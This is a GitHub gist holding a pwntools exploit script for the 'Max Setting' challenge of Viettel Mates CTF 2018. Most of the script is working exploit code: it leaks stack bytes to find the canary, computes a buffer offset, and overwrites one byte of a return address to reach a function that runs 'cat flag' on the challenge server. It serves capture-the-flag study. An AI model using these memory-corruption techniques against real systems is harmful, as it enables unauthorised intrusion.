Last active
June 18, 2018 12:39
-
-
Save ManhNDd/20c90deb791951b39422beb15f685ce7 to your computer and use it in GitHub Desktop.
Viettel Mates CTF 2018 - Max Setting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
author: Nguyen Duc Manh | |
email: imdb95@gmail.com | |
''' | |
from pwn import * | |
import sys | |
import time | |
if sys.argv[1] == 'local': | |
p = process('./maxsetting') | |
else: | |
p = remote('125.235.240.167', 4001) | |
''' | |
let's overwrite the return address of read with 0x55555555490E. | |
+ return address of read: 0xXXXXXXXXXXXXX956 | |
+ address of EzMoney: 0xXXXXXXXXXXXXX90E | |
=> overwrite the least significant byte with '\x0E' => system(cat flag) | |
''' | |
def exploit(retOffset): | |
print hex(retOffset) | |
p.send(p16(retOffset)) | |
raw_input('w') | |
p.send('\x12') | |
p.interactive() | |
def leak(idx, c): | |
p.send(chr(idx)) | |
time.sleep(0.1) | |
p.send(c) | |
data = p.recvuntil('\nTry again?\n') | |
print [data] | |
return data | |
''' | |
Sample stack: | |
0000| 0x7fffffffe3d8 --> 0x55555555496c (<writeANYwhere+75>: ) | |
0008| 0x7fffffffe3e0 --> 0x7ffff7dd2620 --> 0xfbad2087 | |
0016| 0x7fffffffe3e8 --> 0x7ffff7a7cdbd (test DWORD PTR [rbx],0x8000) | |
0024| 0x7fffffffe3f0 --> 0x7fffffffe3f8 --> 0x9a3d590be410e400 | |
0032| 0x7fffffffe3f8 --> 0x9a3d590be410e400 | |
0040| 0x7fffffffe400 --> 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>: push r15) | |
0048| 0x7fffffffe408 --> 0x555555554a3e (<main+34>: mov eax,0x0) | |
0056| 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>: push r15) | |
=> you can recognize cookie with: | |
+ its random bytes and one byte '\x00' | |
+ a qword 0x7fXXXXXXYYXX below | |
=> use a while loop to search for the cookie. u16(chr(i-16)+chr(YY)) should be the offset of buf. | |
''' | |
c = '\x00' | |
i = 0xf8 | |
while i > 0: | |
print hex(i) | |
data = leak(i, c) | |
if '\x7f' not in data and data.count('\x00') < 2: | |
i += 8 | |
p.send('y') | |
data = leak(i, c) | |
print 'is it cookie (the second last)?' | |
uin = raw_input('?') | |
print uin | |
if 'Y' in uin: | |
t2 = ord(data[len('You wrote: \x88')]) | |
offset = u16(chr(i-16)+chr(t2)) | |
print hex(offset) | |
p.send('y') | |
exploit(offset-24) | |
i -= 8 | |
i -= 8 | |
p.send('y') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment